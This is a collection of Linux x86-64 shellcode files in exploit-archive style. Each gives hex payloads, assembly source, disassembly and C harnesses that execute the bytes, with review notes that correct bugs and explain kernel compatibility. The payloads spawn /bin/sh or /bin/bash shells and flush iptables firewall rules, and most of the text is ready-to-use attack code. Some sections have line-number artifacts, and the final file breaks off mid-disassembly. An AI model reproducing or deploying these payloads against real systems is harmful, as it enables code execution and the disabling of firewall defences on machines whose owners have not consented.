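	"\xeb\x15\x5f\x48\x31\xc9\xb1\x1a\x80\x37\xee\xf6\x17\x80\x2f\x03\x48\xff\xc7\xe2\xf3\xeb\x05\xe8\xe6\xff\xff\xff\x5a\x25\xe8\x5a\xeb\xf8\x78\x42\x5a\xaf\x23\x74\x7d\x60\x23\x23\x67\x7a\x47\x46\x73\x7c\x2f\x4a\x03\x19";

/*
 * Test harness: prints the length (valid because the encoded payload is
 * NUL-free) and jumps into code[].  .data must be executable: "-z execstack"
 * only achieves that on kernels that still apply READ_IMPLIES_EXEC to x86-64
 * binaries (Linux 5.8 stopped) -- on newer kernels mmap() a
 * PROT_READ|PROT_WRITE|PROT_EXEC page and copy the bytes there.
 */
int main(void)
{
	printf("Shellcode Length: %d\n", (int)strlen(code));

	int (*ret)() = (int (*)())code;
	ret();
	return 0;
}
-------------------------------------------------------------------------------- /Lin_x86-64/Linux_x86-64_-_execve___sbin_iptables_,____sbin_iptables_,__-F__,_NULL__Shellcode__49_bytes___Shellcode_exploit_for_Lin_x86-64___/shellcode.c: --------------------------------------------------------------------------------
/*
Title: Linux/x86-64 - execve("/sbin/iptables", ["/sbin/iptables", "-F"], NULL) - 49 bytes
Author: 10n1z3d <10n1z3d[at]w[dot]cn>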
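Date: Fri 09 Jul 2010 03:26:12 PM EEST


Source Code (NASM):

section .text
global _start

_start:
    xor rax, rax
    push rax                        ; NUL terminator for "-F"
    push word 0x462d                ; "-F"
    mov rcx, rsp                    ; rcx -> "-F"

    mov rbx, 0x73656c626174ffff     ; "tables" + 0xffff filler (keeps the immediate NUL-free)
    shr rbx, 0x10                   ; drop the filler: "tables\0\0"
    push rbx
    mov rbx, 0x70692f6e6962732f     ; "/sbin/ip"
    push rbx
    mov rdi, rsp                    ; rdi -> "/sbin/iptables"

    push rax                        ; argv[2] = NULL
    push rcx                        ; argv[1] = "-F"
    push rdi                        ; argv[0] = "/sbin/iptables"
    mov rsi, rsp                    ; rsi -> argv

    ; execve("/sbin/iptables", ["/sbin/iptables", "-F"], NULL);
    xor edx, edx                    ; envp = NULL (the published version never set rdx)
    mov al, 0x3b
    syscall

Review notes on the published 49-byte string:
 - It is missing the 0x6e ('n') of "/sbin/ip": "\x48\xbb\x2f\x73\x62\x69\x2f\x69\x70"
   supplies only seven immediate bytes, so the movabs swallows the following
   "push rbx" (0x53) as its eighth byte, rdi ends up pointing at "tables" and
   execve fails with ENOENT.  The NASM source (0x70692f6e6962732f) shows the
   intended eight bytes; the array below restores them.
 - rdx was never initialised, so envp was whatever the caller left in rdx --
   an arbitrary, possibly invalid pointer.  "xor edx, edx" (31 d2) fixes that.
 - With both fixes the payload is 52 bytes and still NUL-free.
 - iptables -F needs CAP_NET_ADMIN and only removes rules: a chain whose
   default policy is DROP keeps dropping.  The execve of /sbin/iptables -F is
   also an easy thing to alert on (e.g. an auditd execve rule).
*/

#include <stdio.h>
#include <string.h>

char shellcode[] = "\x48\x31\xc0\x50\x66\x68\x2d\x46\x48\x89\xe1\x48\xbb\xff\xff"
                   "\x74\x61\x62\x6c\x65\x73\x48\xc1\xeb\x10\x53\x48\xbb\x2f\x73"
                   "\x62\x69\x6e\x2f\x69\x70\x53\x48\x89\xe7\x50\x51\x57\x48\x89\xe6"
                   "\x31\xd2\xb0\x3b\x0f\x05";

/*
 * Test harness: jumps into the .data array, so the data segment must be
 * executable ("-z execstack" no longer implies that on Linux 5.8+ for x86-64;
 * use an mmap(PROT_EXEC) page there).  Nothing runs after a successful
 * execve, since the process image is replaced.
 */
int main(void)
{
	printf("Length: %zu bytes.\n", strlen(shellcode));
	(*(void (*)()) shellcode)();

	return 0;
}
-------------------------------------------------------------------------------- /Lin_x86-64/Linux_x86-64_-_execve__bin_bash_Shellcode__33_bytes___Shellcode_exploit_for_Lin_x86-64_platform/shellcode.c: --------------------------------------------------------------------------------
/*
---------------------------------------------------------------------------------------------------

Linux/x86_x64 - execve(/bin/bash) - 33 bytes

Ajith Kp [ @ajithkp560 ] [ http://www.terminalcoders.blogspot.com ]

Om Asato Maa Sad-Gamaya |
Tamaso Maa Jyotir-Gamaya |
Mrtyor-Maa Amrtam Gamaya |
Om Shaantih Shaantih Shaantih |

---------------------------------------------------------------------------------------------------
Disassembly of section .text:

0000000000400080 <.text>:
  400080:	eb 0b                	jmp    0x40008d
  400082:	5f                   	pop    rdi
  400083:	48 31 d2             	xor    rdx,rdx
  400086:	52                   	push   rdx
  400087:	5e                   	pop    rsi
  400088:	6a 3b                	push   0x3b
  40008a:	58                   	pop    rax
  40008b:	0f 05                	syscall
  40008d: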
e8 f0 ff ff ff call 0x400082 26 | 400092: 2f (bad) 27 | 400093: 2f (bad) 28 | 400094: 2f (bad) 29 | 400095: 2f (bad) 30 | 400096: 62 (bad) 31 | 400097: 69 6e 2f 2f 2f 2f 2f imul ebp,DWORD PTR [rsi+0x2f],0x2f2f2f2f 32 | 40009e: 62 .byte 0x62 33 | 40009f: 61 (bad) 34 | 4000a0: 73 68 jae 0x40010a 35 | --------------------------------------------------------------------------------------------------- 36 | 37 | How To Run 38 | 39 | $ gcc -o bash_shell bash_shell.c 40 | $ execstack -s bash_shell 41 | $ ./bash_shell 42 | 43 | --------------------------------------------------------------------------------------------------- 44 | */ 45 | #include 46 | char sh[]="\xeb\x0b\x5f\x48\x31\xd2\x52\x5e\x6a\x3b\x58\x0f\x05\xe8\xf0\xff\xff\xff\x2f\x2f\x2f\x2f\x62\x69\x6e\x2f\x2f\x2f\x2f\x62\x61\x73\x68"; 47 | void main(int argc, char **argv) 48 | { 49 | int (*func)(); 50 | func = (int (*)()) sh; 51 | (int)(*func)(); 52 | } -------------------------------------------------------------------------------- /Lin_x86-64/Linux_x86-64_-_execve__bin_sh_Null-Free_Shellcode__30_bytes___Shellcode_exploit_for_Lin_x86-64_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | William Borskey 2015 3 | Compile with: gcc -fno-stack-protector -z execstack Shellcode written in 64 bit Intel assembly using yasm. 
4 | 5 | 1 ; int execve(const char *filename, char *const argv[], char *const envp[]); 6 | 2 BITS 64 7 | 3 8 | 4 section .text 9 | 5 global start 10 | 6 11 | 7 start: 12 | 8 mov rcx, 0x1168732f6e69622f ;move the immediate value /bin/sh in hex in 13 | 9 ;little endian byte order into rcx padded with 11 14 | 10 shl rcx, 0x08 ;left shift to trim off the two bytes of padding 15 | 11 shr rcx, 0x08 ;ringht shift to re order string 16 | 12 push rcx ;push the immediate value stored in rcx onto the stack 17 | 13 lea rdi, [rsp] ;load the address of the string that is on the stack into rsi 18 | 14 xor rdx, rdx ;zero out rdx for an execve argument 19 | 15 mov al, 0x3b ;move 0x3b (execve sycall) into al to avoid nulls 20 | 16 syscall ;make the syscall 21 | */ 22 | 23 | char shellcode[] = "\x48\xb9\x2f\x62\x69\x6e\x2f\x73\x68\x11\x48\xc1\xe1\x08\x48\xc1\xe9\x08\x51\x48\x8d\x3c\x24\x48\x31\xd2\xb0\x3b\x0f\x05"; 24 | 25 | int main(int argc, char **argv) 26 | { 27 | int (*func)(); 28 | func = (int (*)()) shellcode; 29 | (int)(*func)(); 30 | return 0; 31 | } -------------------------------------------------------------------------------- /Lin_x86-64/Linux_x86-64_-_execve__bin_sh_Shellcode__22_bytes___Shellcode_exploit_for_Lin_x86-64_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | ;The MIT License (MIT) 2 | 3 | ;Copyright (c) 2017 Robert L. 
Taylor 4 | 5 | ;Permission is hereby granted, free of charge, to any person obtaining a 6 | ;copy of this software and associated documentation files (the “Software”), 7 | ;to deal in the Software without restriction, including without limitation 8 | ;the rights to use, copy, modify, merge, publish, distribute, sublicense, 9 | ;and/or sell copies of the Software, and to permit persons to whom the 10 | ;Software is furnished to do so, subject to the following conditions: 11 | 12 | ;The above copyright notice and this permission notice shall be included 13 | ;in all copies or substantial portions of the Software. 14 | 15 | ;The Software is provided “as is”, without warranty of any kind, express or 16 | ;implied, including but not limited to the warranties of merchantability, 17 | ;fitness for a particular purpose and noninfringement. In no event shall the 18 | ;authors or copyright holders be liable for any claim, damages or other 19 | ;liability, whether in an action of contract, tort or otherwise, arising 20 | ;from, out of or in connection with the software or the use or other 21 | ;dealings in the Software. 
22 | ; 23 | ; For a detailed explanation of this shellcode see my blog post: 24 | ; http://a41l4.blogspot.ca/2017/01/execvestack1434.html 25 | global _start 26 | 27 | section .text 28 | 29 | _start: 30 | ; zeros RAX, RDX and RSI with only 4 bytes of machine code 31 | xor esi,esi 32 | mul esi 33 | 34 | ; null terminator for the following string 35 | push rax 36 | 37 | ; push /bin//sh in reverse 38 | mov rbx,'/bin//sh' 39 | push rbx 40 | 41 | ; store /bin//sh address in RDI, points at string 42 | push rsp 43 | pop rdi 44 | 45 | ; Call the Execve syscall 46 | mov al, 59 47 | syscall -------------------------------------------------------------------------------- /Lin_x86-64/Linux_x86-64_-_execve__bin_sh_Shellcode__24_bytes___Shellcode_exploit_for_Lin_x86-64_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | ;Category: Shellcode 3 | ;Title: GNU/Linux x86_64 - execve /bin/sh 4 | ;Author: m4n3dw0lf 5 | ;Github: https://github.com/m4n3dw0lf 6 | ;Date: 14/06/2017 7 | ;Architecture: Linux x86_64 8 | ;Tested on : #1 SMP Debian 4.9.18-1 (2017-03-30) x86_64 GNU/Linux 9 | 10 | ########## 11 | # Source # 12 | ########## 13 | 14 | section .text 15 | global _start 16 | _start: 17 | push rax 18 | xor rdx, rdx 19 | xor rsi, rsi 20 | mov rbx,'/bin//sh' 21 | push rbx 22 | push rsp 23 | pop rdi 24 | mov al, 59 25 | syscall 26 | 27 | 28 | ################################# 29 | # Compile and execute with NASM # 30 | ################################# 31 | 32 | nasm -f elf64 sh.s -o sh.o 33 | ld sh.o -o sh 34 | 35 | ######################### 36 | # objdump --disassemble # 37 | ######################### 38 | 39 | Disassembly of section .text: 40 | 41 | 0000000000400080 <_start>: 42 | 400080: 50 push %rax 43 | 400081: 48 31 d2 xor %rdx,%rdx 44 | 400084: 48 31 f6 xor %rsi,%rsi 45 | 400087: 48 bb 2f 62 69 6e 2f movabs $0x68732f2f6e69622f,%rbx 46 | 40008e: 2f 73 68 47 | 400091: 53 push %rbx 48 | 400092: 54 push %rsp 49 | 400093: 5f 
pop %rdi 50 | 400094: b0 3b mov $0x3b,%al 51 | 400096: 0f 05 syscall 52 | 53 | ###################### 54 | # 24 Bytes Shellcode # 55 | ###################### 56 | 57 | \x50\x48\x31\xd2\x48\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05 58 | 59 | ######## 60 | # Test # 61 | ######## 62 | 63 | gcc -fno-stack-protector -z execstack shell.c -o shell 64 | 65 | */ 66 | 67 | #include 68 | 69 | unsigned char shellcode[] = \ 70 | "\x50\x48\x31\xd2\x48\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05"; 71 | main() 72 | { 73 | int (*ret)() = (int(*)())shellcode; 74 | ret(); 75 | } -------------------------------------------------------------------------------- /Lin_x86-64/Linux_x86-64_-_execve__bin_sh_Shellcode__25_bytes___1___Shellcode_exploit_for_Lin_x86-64_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | --------------------------------------------------------------------------------------------------- 3 | 4 | Linux/x86_x64 - execve(/bin/sh) - 25 bytes 5 | 6 | Ajith Kp [ @ajithkp560 ] [ http://www.terminalcoders.blogspot.com ] 7 | 8 | Om Asato Maa Sad-Gamaya | 9 | Tamaso Maa Jyotir-Gamaya | 10 | Mrtyor-Maa Amrtam Gamaya | 11 | Om Shaantih Shaantih Shaantih | 12 | 13 | Thanks for Unknown Commented in my Blog 14 | 15 | --------------------------------------------------------------------------------------------------- 16 | Disassembly of section .text: 17 | 18 | 0000000000400080 <.text>: 19 | 400080: eb 0b jmp 0x40008d 20 | 400082: 5f pop rdi 21 | 400083: 48 31 d2 xor rdx,rdx 22 | 400086: 52 push rdx 23 | 400087: 5e pop rsi 24 | 400088: 6a 3b push 0x3b 25 | 40008a: 58 pop rax 26 | 40008b: 0f 05 syscall 27 | 40008d: e8 f0 ff ff ff call 0x400082 28 | 400092: 2f (bad) 29 | 400093: 62 (bad) 30 | 400094: 69 .byte 0x69 31 | 400095: 6e outs dx,BYTE PTR ds:[rsi] 32 | 400096: 2f (bad) 33 | 400097: 73 68 jae 0x400101 34 | 
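---------------------------------------------------------------------------------------------------

How To Run

$ gcc -o sh_shell sh_shell.c
$ execstack -s sh_shell
$ ./sh_shell

---------------------------------------------------------------------------------------------------
*/
#include <stdio.h>
/*
 * jmp/call/pop execve("/bin/sh", NULL, NULL).  The 25 bytes end with
 * "/bin/sh" and no terminating NUL: the path is well-formed here only because
 * the C string literal appends one.  When these bytes are embedded in a real
 * payload, a zero byte must follow them.
 */
char sh[]="\xeb\x0b\x5f\x48\x31\xd2\x52\x5e\x6a\x3b\x58\x0f\x05\xe8\xf0\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
/*
 * Test harness: jumps into the .data array, so it needs an executable data
 * segment.  execstack -s / -z execstack only provide that on kernels that
 * still apply READ_IMPLIES_EXEC to x86-64 binaries (before Linux 5.8).
 */
int main(int argc, char **argv)
{
	int (*func)();
	func = (int (*)()) sh;
	(*func)();
	return 0;
}
-------------------------------------------------------------------------------- /Lin_x86-64/Linux_x86-64_-_execve__bin_sh_Shellcode__25_bytes___2___Shellcode_exploit_for_Lin_x86-64_platform/shellcode.c: --------------------------------------------------------------------------------
#include <stdio.h>
#include <string.h>

/*
by Magnefikko
14.04.2010
magnefikko@gmail.com
promhyl.oz.pl
Subgroup: #PRekambr
Name: 25 bytes execve("/bin/sh") shellcode
Platform: Linux x86

execve("/bin/sh", 0, 0);
gcc -Wl,-z,execstack filename.c

shellcode:

\xeb\x0b\x5b\x31\xc0\x31\xc9\x31\xd2\xb0\x0b\xcd\x80\xe8\xf0\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68

Review note: this is 32-bit (IA-32) shellcode, as the author's "Platform"
line says -- pop ebx / mov al,0x0b / int 0x80 is the i386 execve ABI -- even
though it is filed under x86-64.  Inside a 64-bit process int 0x80 enters the
32-bit compat layer (only if the kernel has CONFIG_IA32_EMULATION and no
seccomp arch filter blocks it) and the kernel uses just the low 32 bits of
ebx/ecx/edx.  The 0x5b "pop" pops a full 64-bit return address here, so with
shell[] on the 64-bit stack (0x7f...) the truncated path pointer is invalid
and execve fails with EFAULT.  Build it with -m32, or use one of the 64-bit
25-byte variants.

As published the harness did not compile: it called "shellcode" while the
array is named "shell", and the printf format string was split across two
source lines.

*/


int main(void)
{
	char shell[] =
	"\xeb\x0b\x5b\x31\xc0\x31\xc9\x31\xd2\xb0\x0b\xcd\x80\xe8\xf0\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
	printf("by Magnefikko\nmagnefikko@gmail.com\npromhyl.oz.pl\n\nstrlen(shell) = %zu\n", strlen(shell));
	(*(void (*)()) shell)();
	return 0;
}
-------------------------------------------------------------------------------- /Lin_x86-64/Linux_x86-64_-_execve__bin_sh_Shellcode__26_bytes___Shellcode_exploit_for_Lin_x86-64_platform/shellcode.c: --------------------------------------------------------------------------------
/*
---------------------------------------------------------------------------------------------------
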
Linux/x86_x64 - execve(/bin/sh) - 26 bytes 5 | 6 | Ajith Kp [ @ajithkp560 ] [ http://www.terminalcoders.blogspot.com ] 7 | 8 | Om Asato Maa Sad-Gamaya | 9 | Tamaso Maa Jyotir-Gamaya | 10 | Mrtyor-Maa Amrtam Gamaya | 11 | Om Shaantih Shaantih Shaantih | 12 | 13 | --------------------------------------------------------------------------------------------------- 14 | Disassembly of section .text: 15 | 16 | 0000000000400080 <.text>: 17 | 400080: eb 0b jmp 0x40008d 18 | 400082: 5f pop %rdi 19 | 400083: 48 31 d2 xor %rdx,%rdx 20 | 400086: 48 89 d6 mov %rdx,%rsi 21 | 400089: b0 3b mov $0x3b,%al 22 | 40008b: 0f 05 syscall 23 | 40008d: e8 f0 ff ff ff callq 0x400082 24 | 400092: 2f (bad) 25 | 400093: 2f (bad) 26 | 400094: 62 (bad) 27 | 400095: 69 .byte 0x69 28 | 400096: 6e outsb %ds:(%rsi),(%dx) 29 | 400097: 2f (bad) 30 | 400098: 73 68 jae 0x400102 31 | --------------------------------------------------------------------------------------------------- 32 | 33 | How To Run 34 | 35 | $ gcc -o sh_shell sh_shell.c 36 | $ execstack -s sh_shell 37 | $ ./sh_shell 38 | 39 | --------------------------------------------------------------------------------------------------- 40 | */ 41 | #include 42 | char sh[]="\xeb\x0b\x5f\x48\x31\xd2\x48\x89\xd6\xb0\x3b\x0f\x05\xe8\xf0\xff\xff\xff\x2f\x2f\x62\x69\x6e\x2f\x73\x68"; 43 | void main(int argc, char **argv) 44 | { 45 | int (*func)(); 46 | func = (int (*)()) sh; 47 | (int)(*func)(); 48 | } -------------------------------------------------------------------------------- /Lin_x86-64/Linux_x86-64_-_execve__bin_sh_Shellcode__30_bytes___Shellcode_exploit_for_Lin_x86-64_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | # Linux/x86_64 execve("/bin/sh"); 30 bytes shellcode 2 | # Date: 2010-04-26 3 | # Author: zbt 4 | # Tested on: x86_64 Debian GNU/Linux 5 | 6 | /* 7 | ; execve("/bin/sh", ["/bin/sh"], NULL) 8 | 9 | section .text 10 | global _start 11 | 12 | _start: 13 | xor rdx, rdx 14 | mov 
qword rbx, '//bin/sh' 15 | shr rbx, 0x8 16 | push rbx 17 | mov rdi, rsp 18 | push rax 19 | push rdi 20 | mov rsi, rsp 21 | mov al, 0x3b 22 | syscall 23 | */ 24 | 25 | int main(void) 26 | { 27 | char shellcode[] = 28 | "\x48\x31\xd2" // xor %rdx, %rdx 29 | "\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68" // mov 30 | $0x68732f6e69622f2f, %rbx 31 | "\x48\xc1\xeb\x08" // shr $0x8, %rbx 32 | "\x53" // push %rbx 33 | "\x48\x89\xe7" // mov %rsp, %rdi 34 | "\x50" // push %rax 35 | "\x57" // push %rdi 36 | "\x48\x89\xe6" // mov %rsp, %rsi 37 | "\xb0\x3b" // mov $0x3b, %al 38 | "\x0f\x05"; // syscall 39 | 40 | (*(void (*)()) shellcode)(); 41 | 42 | return 0; 43 | } -------------------------------------------------------------------------------- /Lin_x86-64/Linux_x86-64_-_execve__bin_sh_Shellcode__31_bytes___1___Shellcode_exploit_for_Lin_x86-64_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | ;Title: Linux/x86-64 - /bin/sh Shellcode 3 | ;Author: Touhid M.Shaikh 4 | ;Contact: https://github.com/touhidshaikh 5 | ;Category: Shellcode 6 | ;Architecture: Linux x86_64 7 | ;Description: This shellcode baased on "JMP CALL POP" method to Execute "/bin//sh". Length of shellcode is 31 bytes. 8 | ;Tested on : #1 SMP PREEMPT RT Debian 4.9.25-1kali1 (2017-05-04) 9 | 10 | 11 | 12 | ===COMPILATION AND EXECUTION=== 13 | #nasm -f elf64 shell.asm -o shell.o 14 | 15 | #ld shell.o -o shell <=== Making Binary File 16 | 17 | 18 | #./bin2shell.sh shell <== xtract hex code from the binary(https://github.com/touhidshaikh/bin2shell) 19 | 20 | =================SHELLCODE(INTEL FORMAT)================= 21 | 22 | section .text 23 | global _start 24 | _start: 25 | jmp shell 26 | here: 27 | xor rax,rax 28 | pop rdi 29 | xor rsi,rsi 30 | xor rdx,rdx 31 | add rax,59 32 | syscall 33 | shell: 34 | call here 35 | bash db "/bin//sh" 36 | 37 | ===================END HERE============================ 38 | 39 | Compile with gcc with some options. 
40 | 41 | # gcc -fno-stack-protector -z execstack shell-testing.c -o shell-testing 42 | 43 | 44 | */ 45 | 46 | #include 47 | #include 48 | 49 | unsigned char code[] = \ 50 | "\xeb\x10\x48\x31\xc0\x5f\x48\x31\xf6\x48\x31\xd2\x48\x83\xc0\x3b\x0f\x05\xe8\xeb\xff\xff\xff\x2f\x62\x69\x6e\x2f\x2f\x73\x68"; 51 | 52 | main() 53 | { 54 | printf("Touhid Shaikh (http://www.touhidshaikh.com)\n"); 55 | printf("Shellcode Length : %d\n", (int)strlen(code)); 56 | 57 | int (*ret)() = (int(*)())code; 58 | 59 | ret(); 60 | 61 | } -------------------------------------------------------------------------------- /Lin_x86-64/Linux_x86-64_-_execve__bin_sh_Shellcode__33_bytes___Shellcode_exploit_for_Lin_x86-64_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | # [Linux/X86-64] 2 | # Dummy for shellcode: 3 | # execve("/bin/sh", ["/bin/sh"], NULL) 4 | # hophet [at] gmail.com 5 | 6 | .text 7 | .globl _start 8 | _start: 9 | 10 | xorq %rdx, %rdx 11 | movq $0x68732f6e69622fff,%rbx 12 | shr $0x8, %rbx 13 | push %rbx 14 | movq %rsp,%rdi 15 | xorq %rax,%rax 16 | pushq %rax 17 | pushq %rdi 18 | movq %rsp,%rsi 19 | mov $0x3b,%al # execve(3b) 20 | syscall 21 | 22 | pushq $0x1 23 | pop %rdi 24 | pushq $0x3c # exit(3c) 25 | pop %rax 26 | syscall 27 | 28 | 29 | # milw0rm.com [2006-11-02] -------------------------------------------------------------------------------- /Lin_x86-64/Linux_x86-64_-_execve__bin_sh_Shellcode__34_bytes___Shellcode_exploit_for_Lin_x86-64_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | # Exploit Title: Shellcode /bin/sh for Linux x86_64 (different approach) 2 | # Date: 2015-09-10 3 | # Exploit Author: Fanda Uchytil 4 | # Version: 1 5 | # Tested on: Linux 3.16.0-4-amd64 (Debian), 2.6.32-openvz-042stab093.5-amd64 (Centos/RHEL based), 2.6.32-5-amd64 (Debian) 6 | 7 | 8 | AT&T VERSION (for smooth debug) 9 | ------------------------------- 10 | 11 | .global _start 12 | 
.text 13 | _start: 14 | # int execve(const char *filename, char *const argv[], char *const envp[]); 15 | xor %rax, %rax 16 | add $59, %rax # Linux 64b execve 17 | xor %rdi, %rdi 18 | push %rdi # '\0' for termination of string below 19 | mov $0x68732F2f6e69622F, %rdi # "/bin//sh" (slash padding) 20 | push %rdi 21 | lea (%rsp), %rdi 22 | xor %rsi, %rsi # no shell arguments 23 | xor %rdx, %rdx # no env vars 24 | syscall 25 | 26 | 27 | $ gcc -nostdlib shellcode_atnt.s -o shellcode_atnt && objdump -d shellcode_atnt 28 | $ ./shellcode_atnt 29 | $ gdb -q ./shellcode_atnt 30 | 31 | 32 | Disassembly of section .text: 33 | 4000d4: 48 31 c0 xor %rax,%rax 34 | 4000d7: 48 83 c0 3b add $0x3b,%rax 35 | 4000db: 48 31 ff xor %rdi,%rdi 36 | 4000de: 57 push %rdi 37 | 4000df: 48 bf 2f 62 69 6e 2f movabs $0x68732f2f6e69622f,%rdi 38 | 4000e6: 2f 73 68 39 | 4000e9: 57 push %rdi 40 | 4000ea: 48 8d 3c 24 lea (%rsp),%rdi 41 | 4000ee: 48 31 f6 xor %rsi,%rsi 42 | 4000f1: 48 31 d2 xor %rdx,%rdx 43 | 4000f4: 0f 05 syscall 44 | 45 | 46 | 47 | 48 | INTEL VERSION 49 | ------------- 50 | 51 | BITS 64 52 | xor rax, rax 53 | add rax, 59 54 | xor rdi, rdi 55 | push rdi 56 | mov rdi, 0x68732F2f6e69622F 57 | push rdi 58 | lea rdi, [rsp] 59 | xor rsi, rsi 60 | xor rdx, rdx 61 | syscall 62 | 63 | 64 | $ nasm shellcode.a 65 | 66 | 67 | 68 | 69 | SHELLCODE_TEST.C 70 | ---------------- 71 | 72 | int main(int argc, char **argv) { 73 | int (*f)() = (int(*)()) argv[1]; 74 | return (*f)(); 75 | } 76 | 77 | 78 | $ gcc -o shellcode_test shellcode_test.c -z execstack # or use `execstack(8)` before command below 79 | $ ./shellcode_test "$(cat shellcode)" 80 | 81 | 82 | 83 | 84 | STRING 85 | ------ 86 | 87 | $ xxd -p -c 256 shellcode | tr -d '\n' | sed 's/../\\&/g' 88 | \48\31\c0\48\83\c0\3b\48\31\ff\57\48\bf\2f\62\69\6e\2f\2f\73\68\57\48\8d\3c\24\48\31\f6\48\31\d2\0f\05 89 | 90 | $ ./shellcode_test "$(printf "$(xxd -p -c 256 shellcode | tr -d '\n' | sed 's/../\\x&/g')")" 
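-------------------------------------------------------------------------------- /Lin_x86-64/Linux_x86-64_-_execve__bin_sh_Shellcode__52_bytes___Shellcode_exploit_for_Lin_x86-64_platform/shellcode.c: --------------------------------------------------------------------------------
/*

Exploit Title : linux/x86-64 execve(/bin/sh) 52 bytes
Tested on : Linux iron 2.6.38-8-generic #42-Ubuntu SMP Mon Apr 11 03:31:24 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux
Date : 03/12/2011
Author : X-h4ck
Email : mem001@live.com
Website : http://www.pirate.al
Greetz : mywisdom - Danzel - Wulns~ - IllyrianWarrior- Ace - M4yh3m - Saldeath
ev1lut1on - bi0 - Slimshaddy - d3trimentaL - Lekosta
CR - Hack-Down - H3ll - Pretorian - d4nte_sA

Review note -- what the bytes do:

  eb 1d             jmp  +0x1d            ; to the call below
  5b                pop  rbx              ; rbx -> "/bin/sh" (8-byte pop in 64-bit mode)
  31 c0             xor  eax, eax
  67 89 43 07       mov  [ebx+7], eax     ; NUL-terminate the path (0x67 = 32-bit addressing)
  67 89 5b 08       mov  [ebx+8], ebx     ; argv[0] = path (stores only the low 32 bits)
  67 89 43 0c       mov  [ebx+12], eax    ; argv[1] = NULL
  31 c0 b0 0b       mov  al, 11           ; i386 __NR_execve
  67 8d 4b 08       lea  ecx, [ebx+8]     ; argv
  67 8d 53 0c       lea  edx, [ebx+12]    ; envp -> the NULL slot (empty environment)
  cd 80             int  0x80             ; 32-bit compat syscall entry
  e8 de ff ff ff    call back to the pop
  "/bin/sh" "N" "AAAA" "BBBB"             ; path, terminator slot, argv[0] slot, argv[1] slot

So despite the title this is an i386-ABI payload run through the compat
layer: it needs CONFIG_IA32_EMULATION (and no seccomp arch filter blocking
int 0x80), it patches itself (SC[] must be writable *and* executable), and
every address it uses is truncated to 32 bits by the 0x67 prefixes and by
int 0x80.  It therefore works only while SC[] sits below 4 GiB -- true for
the non-PIE binary of 2011, false for today's default PIE binaries (loaded
around 0x55...), where it faults on the first store.

*/

#include <stdlib.h>

char SC[] = "\xeb\x1d\x5b\x31\xc0\x67\x89\x43\x07\x67\x89\x5b\x08\x67\x89\x43\x0c"\
            "\x31\xc0\xb0\x0b\x67\x8d\x4b\x08\x67\x8d\x53\x0c\xcd\x80\xe8\xde\xff"\
            "\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x4e\x41\x41\x41\x41\x42\x42\x42"\
            "\x42";

/*
 * Test harness: needs a writable, executable data segment (see above).  The
 * published version called exit() without including <stdlib.h>.
 */
int
main (int argc, char **argv)
{
	int (*ret)();
	ret = (int(*)())SC;

	(*ret)();
	exit(0);
}
-------------------------------------------------------------------------------- /Lin_x86-64/Linux_x86-64_-_execve__bin_sh_Via_Push_Shellcode__23_bytes___Shellcode_exploit_for_Lin_x86-64_platform/shellcode.c: --------------------------------------------------------------------------------
/*
#
# Execve /bin/sh Shellcode Via Push (Linux x86_64 23 bytes)
#
# Dying to be the shortest.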
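#
# Copyright (C) 2015 Gu Zhengxiong (rectigu@gmail.com)
#
# 27 April 2015
#
# GPL
#


.global _start
_start:
# char *const argv[]
xorl %esi, %esi

# 'h' 's' '/' '/' 'n' 'i' 'b' '/'
movq $0x68732f2f6e69622f, %rbx

# for '\x00'
pushq %rsi

pushq %rbx

pushq %rsp
# const char *filename
popq %rdi

# __NR_execve 59
pushq $59
popq %rax

# char *const envp[]
xorl %edx, %edx

syscall
*/

/*
gcc -z execstack push64.c

uname -r
3.19.3-3-ARCH
*/

#include <stdio.h>
#include <string.h>

/*
 * Test harness.  The bytes are placed in a stack array on purpose: the stack
 * is the one region "-z execstack" reliably makes executable.  The published
 * version used a char* to a string literal, i.e. .rodata, which was only
 * executable on kernels that still applied READ_IMPLIES_EXEC to x86-64
 * binaries (Linux 5.8 dropped that) and segfaults on newer ones.
 * The payload sets rax, rsi and rdx itself, so it makes no assumptions about
 * register state on entry.
 */
int
main(void)
{
	char shellcode[] = "\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56"
	                   "\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05";

	printf("strlen(shellcode)=%zu\n", strlen(shellcode));

	((void (*)(void))shellcode)();

	return 0;
}
-------------------------------------------------------------------------------- /Lin_x86-64/Linux_x86-64_-_mkdir_Shellcode__25_bytes___Shellcode_exploit_for_Lin_x86-64_platform/shellcode.c: --------------------------------------------------------------------------------
/*
---------------------------------------------------------------------------------------------------

Linux/x86_x64 - mkdir("ajit", 0755) - 25 bytes   (the 0x1ef mode below is octal 0755, not decimal 755)

Ajith Kp [ http://fb.com/ajithkp560 ] [ http://www.terminalcoders.blogspot.com ]
Vishnu Nath Kp [ http://www.terminalcoders.blogspot.com ]
Sayooj S Nambiar [ http://fb.com/sayooj.sivadas ]

Om Asato Maa Sad-Gamaya |
Tamaso Maa Jyotir-Gamaya |
Mrtyor-Maa Amrtam Gamaya |
Om Shaantih Shaantih Shaantih |

---------------------------------------------------------------------------------------------------
Disassembly of section .text:

0000000000400080 <.text>:
  400080:	48 31 f6             	xor    %rsi,%rsi
  400083:	56                   	push   %rsi
  400084:	68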
